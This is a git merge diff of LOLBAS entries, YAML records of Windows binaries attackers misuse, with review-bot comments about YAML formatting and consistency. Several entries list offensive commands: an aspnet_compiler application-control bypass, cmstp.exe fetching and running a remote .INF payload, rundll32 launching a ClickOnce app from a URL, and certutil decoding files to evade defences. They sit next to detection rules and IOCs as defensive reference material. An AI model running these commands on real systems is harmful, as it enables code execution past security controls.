mirror of https://github.com/LOLBAS-Project/LOLBAS
synced 2025-10-25 14:55:19 +02:00

	Merge branch 'master' into alias_introduction
		| @@ -20,4 +20,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Wade Hickey | ||||
|     Handle: '@notwhickey' | ||||
| --- | ||||
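Review bot: the trailing `---` dropped here (and at the same position in most other files in this merge) is not a terminator but a YAML document-start marker, so each file was opening a second, empty document after the real one; single-document loaders such as PyYAML's `safe_load` reject that with "expected a single document in the stream", so the removal is the right fix, but say so in the commit message, since it touches nearly every file, and run the project's lint/schema step once over the set to confirm a file that now ends on a `Handle:` line still validates.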
|   | ||||
| @@ -1,28 +1,27 @@ | ||||
| --- | ||||
| Name: Aspnet_Compiler.exe | ||||
| Description: ASP.NET Compilation Tool | ||||
| Author: Jimmy (@bohops) | ||||
| Created: 2021-09-26 | ||||
| Commands: | ||||
|   - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u | ||||
|     Description: Execute C# code with the Build Provider and proper folder structure in place. | ||||
|     Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | ||||
|   - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe | ||||
| Code_Sample: | ||||
|   - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder | ||||
| Detection: | ||||
|   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml | ||||
| Resources: | ||||
|   - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ | ||||
|   - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 | ||||
| Acknowledgement: | ||||
|   - Person: cpl | ||||
|     Handle: '@cpl3h' | ||||
| --- | ||||
| --- | ||||
| Name: Aspnet_Compiler.exe | ||||
| Description: ASP.NET Compilation Tool | ||||
| Author: Jimmy (@bohops) | ||||
| Created: 2021-09-26 | ||||
| Commands: | ||||
|   - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u | ||||
|     Description: Execute C# code with the Build Provider and proper folder structure in place. | ||||
|     Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | ||||
|   - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe | ||||
| Code_Sample: | ||||
|   - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder | ||||
| Detection: | ||||
|   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml | ||||
| Resources: | ||||
|   - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ | ||||
|   - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 | ||||
| Acknowledgement: | ||||
|   - Person: cpl | ||||
|     Handle: '@cpl3h' | ||||
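Review bot: the Aspnet_Compiler.exe file shows up as a full remove/re-add (`@@ -1,28 +1,27 @@`) although the only visible difference between the two copies is the dropped trailing `---`, which means a whole-file line-ending or whitespace change is riding along with the merge; check with `git diff -w` (or `--ignore-cr-at-eol`) and, if it is an EOL normalisation, note it in the commit or split it out so the content diff stays reviewable. While here: both `Full_Path` entries use a lowercase drive letter (`c:\Windows\Microsoft.NET\...`) where every other entry in this diff writes `C:\Windows\...`, and the example command hard-codes the researcher's own `C:\users\cpl.internal\desktop\asptest\`; a neutral placeholder directory would read better in a reference entry.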
|   | ||||
| @@ -23,7 +23,7 @@ Detection: | ||||
|   - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. | ||||
| Resources: | ||||
|   - Link: https://freddiebarrsmith.com/at.txt | ||||
|   - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator | ||||
|   - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html | ||||
|   - Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems | ||||
| Acknowledgement: | ||||
|   - Person: 'Freddie Barr-Smith' | ||||
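Review bot: stripping ` - Escalate to System from Administrator` from the sushant747 link makes the `Link` value a bare URL, which is what the field expects, but the pointer to the relevant section of that long page goes with it; if the page exposes a section anchor, append it to the URL, otherwise the context is simply lost. The unchanged IOC line at the top of the hunk also ends the registry path with a period (`...\TaskCache\Tree\At1.`), which reads as part of the key name; drop the period.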
| @@ -34,4 +34,3 @@ Acknowledgement: | ||||
|     Handle: | ||||
|   - Person: 'Xabier Ugarte-Pedrero' | ||||
|     Handle: | ||||
| --- | ||||
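Review bot: both `Handle:` fields in this `Acknowledgement:` block are empty; either fill them in or omit the key for those two entries, rather than rendering a blank handle next to each name.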
|   | ||||
| @@ -14,17 +14,14 @@ Commands: | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\Atbroker.exe | ||||
|   - Path: C:\Windows\SysWOW64\Atbroker.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml | ||||
|  - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration | ||||
|  - IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs | ||||
|  - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml | ||||
|   - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration | ||||
|   - IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs | ||||
|   - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware | ||||
| Resources: | ||||
|   - Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ | ||||
| Acknowledgement: | ||||
|   - Person: Adam | ||||
|     Handle: '@hexacorn' | ||||
| --- | ||||
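Review bot: this hunk deletes the empty `Code_Sample:` / `- Code:` pair outright, whereas the control.exe, csc.exe, cscript.exe, dfsvc.exe, diskshadow.exe, dnscmd.exe, esentutl.exe, expand.exe and extexport.exe hunks in the same merge keep the pair and only re-indent it (cmd.exe, cmdkey.exe and cmstp.exe follow the deletion done here). Pick one treatment for the whole set so the site generator and schema do not have to accept both a missing key and an empty list item, and state which in the commit message. The indentation fix itself is right: the old one-space `Detection:` entries parse as YAML but disagree with the two-space convention used everywhere else in the file.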
|   | ||||
| @@ -48,4 +48,3 @@ Acknowledgement: | ||||
|     Handle: '@aionescu' | ||||
|   - Person: Asif Matadar | ||||
|     Handle: '@d1r4c' | ||||
| --- | ||||
|   | ||||
| @@ -46,7 +46,7 @@ Detection: | ||||
|   - IOC: bitsadmin creates new files | ||||
|   - IOC: bitsadmin adds data to alternate data stream | ||||
| Resources: | ||||
|   - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53 | ||||
|   - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 | ||||
|   - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Acknowledgement: | ||||
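Review bot: dropping ` - slide 53` from the slideshare link loses the only pointer to where in the deck the bitsadmin material sits; `Link` cannot carry a note, so either append a slide anchor to the URL if slideshare provides one, or move the slide number into the relevant command's `Description`.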
| @@ -56,4 +56,3 @@ Acknowledgement: | ||||
|     Handle: '@carnal0wnage' | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -34,4 +34,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Ensar Samil | ||||
|     Handle: '@sblmsrsn' | ||||
| --- | ||||
|   | ||||
| @@ -32,4 +32,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: David Middlehurst | ||||
|     Handle: '@dtmsecurity' | ||||
| --- | ||||
|   | ||||
| @@ -39,7 +39,7 @@ Commands: | ||||
|     Privileges: User | ||||
|     MitreID: T1140 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: certutil --decodehex encoded_hexadecimal_InputFileName | ||||
|   - Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName | ||||
|     Description: Command to decode a hexadecimal-encoded file decodedOutputFileName | ||||
|     Usecase: Decode files to evade defensive measures | ||||
|     Category: Decode | ||||
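Review bot: the corrected command `certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName` is right on both counts: certutil verbs take a single dash, and `-decodehex` needs both the InFile and OutFile positional arguments, so the old `--decodehex` form with one file did not match the documented syntax. The Description line under it still reads "Command to decode a hexadecimal-encoded file decodedOutputFileName", naming the output as though it were the input; reword to "Decode the hexadecimal-encoded file encoded_hexadecimal_InputFileName into decodedOutputFileName".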
| @@ -75,4 +75,3 @@ Acknowledgement: | ||||
|   - Person: egre55 | ||||
|     Handle: '@egre55' | ||||
|   - Person: Lior Adar | ||||
| --- | ||||
|   | ||||
| @@ -21,17 +21,14 @@ Commands: | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\cmd.exe | ||||
|   - Path: C:\Windows\SysWOW64\cmd.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml | ||||
|  - IOC: cmd.exe executing files from alternate data streams. | ||||
|  - IOC: cmd.exe creating/modifying file contents in an alternate data stream. | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml | ||||
|   - IOC: cmd.exe executing files from alternate data streams. | ||||
|   - IOC: cmd.exe creating/modifying file contents in an alternate data stream. | ||||
| Resources: | ||||
|   - Link: https://twitter.com/yeyint_mth/status/1143824979139579904 | ||||
| Acknowledgement: | ||||
|   - Person: r0lan | ||||
|     Handle: '@yeyint_mth' | ||||
| --- | ||||
|   | ||||
| @@ -14,14 +14,11 @@ Commands: | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\cmdkey.exe | ||||
|   - Path: C:\Windows\SysWOW64\cmdkey.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml | ||||
| Resources: | ||||
|   - Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation | ||||
|   - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey | ||||
| Acknowledgement: | ||||
|   - Person: | ||||
|     Handle: | ||||
| --- | ||||
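Review bot: the `Acknowledgement:` block here carries an empty `Person:` / `Handle:` pair (the csc.exe entry in this merge has the same); with nobody credited, drop the block or add the contributor rather than shipping blank fields.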
|   | ||||
| @@ -23,4 +23,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Elliot Killick | ||||
|     Handle: '@elliotkillick' | ||||
| --- | ||||
|   | ||||
| @@ -14,24 +14,22 @@ Commands: | ||||
|   - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf | ||||
|     Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. | ||||
|     Usecase: Execute code hidden within an inf file. Execute code directly from Internet. | ||||
|     Category: AwL bypass | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1218.003 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\cmstp.exe | ||||
|   - Path: C:\Windows\SysWOW64\cmstp.exe | ||||
| Code_Sample: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml | ||||
|  - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml | ||||
|  - IOC: Execution of cmstp.exe without a VPN use case is suspicious | ||||
|  - IOC: DotNet CLR libraries loaded into cmstp.exe | ||||
|  - IOC: DotNet CLR Usage Log - cmstp.exe.log | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml | ||||
|   - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml | ||||
|   - IOC: Execution of cmstp.exe without a VPN use case is suspicious | ||||
|   - IOC: DotNet CLR libraries loaded into cmstp.exe | ||||
|   - IOC: DotNet CLR Usage Log - cmstp.exe.log | ||||
| Resources: | ||||
|   - Link: https://twitter.com/NickTyrer/status/958450014111633408 | ||||
|   - Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 | ||||
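Review bot: `Category: AwL bypass` to `AWL Bypass` brings this entry in line with the dfsvc.exe and aspnet_compiler.exe entries; good. Two things in the surrounding context deserve the same pass: the example command fetches its payload from `https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf`, the pre-project fork, while this repository is `LOLBAS-Project/LOLBAS`, so point it at the project's own Payload path rather than depending on a third-party repo staying up; and the empty `Code_Sample:` block is removed here while the control.exe hunk below keeps its own, which should be made consistent across the merge.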
| @@ -44,4 +42,3 @@ Acknowledgement: | ||||
|     Handle: '@oddvarmoe' | ||||
|   - Person: Nick Tyrer | ||||
|     Handle: '@NickTyrer' | ||||
| --- | ||||
|   | ||||
| @@ -29,4 +29,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Ialle Teixeira | ||||
|     Handle: '@NtSetDefault' | ||||
| --- | ||||
|   | ||||
| @@ -24,4 +24,3 @@ Acknowledgement: | ||||
|     Handle: '@hexacorn' | ||||
|   - Person: Wietze | ||||
|     Handle: '@wietze' | ||||
| --- | ||||
|   | ||||
| @@ -15,16 +15,16 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\control.exe | ||||
|   - Path: C:\Windows\SysWOW64\control.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml | ||||
|  - IOC: Control.exe executing files from alternate data streams | ||||
|  - IOC: Control.exe executing library file without cpl extension  | ||||
|  - IOC: Suspicious network connections from control.exe | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml | ||||
|   - IOC: Control.exe executing files from alternate data streams | ||||
|   - IOC: Control.exe executing library file without cpl extension | ||||
|   - IOC: Suspicious network connections from control.exe | ||||
| Resources: | ||||
|   - Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ | ||||
|   - Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ | ||||
| @@ -34,4 +34,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Jimmy | ||||
|     Handle: '@bohops' | ||||
| --- | ||||
|   | ||||
| @@ -22,16 +22,15 @@ Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml | ||||
|  - IOC: Csc.exe should normally not run as System account unless it is used for development. | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml | ||||
|   - IOC: Csc.exe should normally not run as System account unless it is used for development. | ||||
| Resources: | ||||
|   - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe | ||||
| Acknowledgement: | ||||
|   - Person: | ||||
|     Handle: | ||||
| --- | ||||
|   | ||||
| @@ -15,22 +15,21 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\cscript.exe | ||||
|   - Path: C:\Windows\SysWOW64\cscript.exe | ||||
| Code_Sample: | ||||
|  - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml | ||||
|  - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml | ||||
|  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules | ||||
|  - IOC: Cscript.exe executing files from alternate data streams | ||||
|  - IOC: DotNet CLR libraries loaded into cscript.exe | ||||
|  - IOC: DotNet CLR Usage Log - cscript.exe.log | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml | ||||
|   - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml | ||||
|   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules | ||||
|   - IOC: Cscript.exe executing files from alternate data streams | ||||
|   - IOC: DotNet CLR libraries loaded into cscript.exe | ||||
|   - IOC: DotNet CLR Usage Log - cscript.exe.log | ||||
| Resources: | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|   - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -27,4 +27,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Ialle Teixeira | ||||
|     Handle: '@NtSetDefault' | ||||
| --- | ||||
|   | ||||
| @@ -26,4 +26,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Gal Kristal | ||||
|     Handle: '@gal_kristal' | ||||
| --- | ||||
|   | ||||
| @@ -7,7 +7,7 @@ Commands: | ||||
|   - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo | ||||
|     Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) | ||||
|     Usecase: Use binary to bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
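Review bot: the casing fix `AWL bypass` to `AWL Bypass` matches the cmstp.exe change in this merge. The `OperatingSystem` value two lines below still has `Windows vista` in lowercase next to the capitalised `Windows 7`, `Windows 8` and so on; the certutil, cmstp and eventvwr entries carry the same string, so the normalisation pass should cover it too.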
| @@ -17,13 +17,12 @@ Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml | ||||
| Resources: | ||||
|   - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf | ||||
|   - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
|   | ||||
| @@ -35,4 +35,3 @@ Acknowledgement: | ||||
|     Handle: '@tim8288' | ||||
|   - Person: Hai Vaknin | ||||
|     Handle: '@vakninhai' | ||||
| --- | ||||
|   | ||||
| @@ -22,15 +22,14 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\diskshadow.exe | ||||
|   - Path: C:\Windows\SysWOW64\diskshadow.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml | ||||
|  - IOC: Child process from diskshadow.exe | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml | ||||
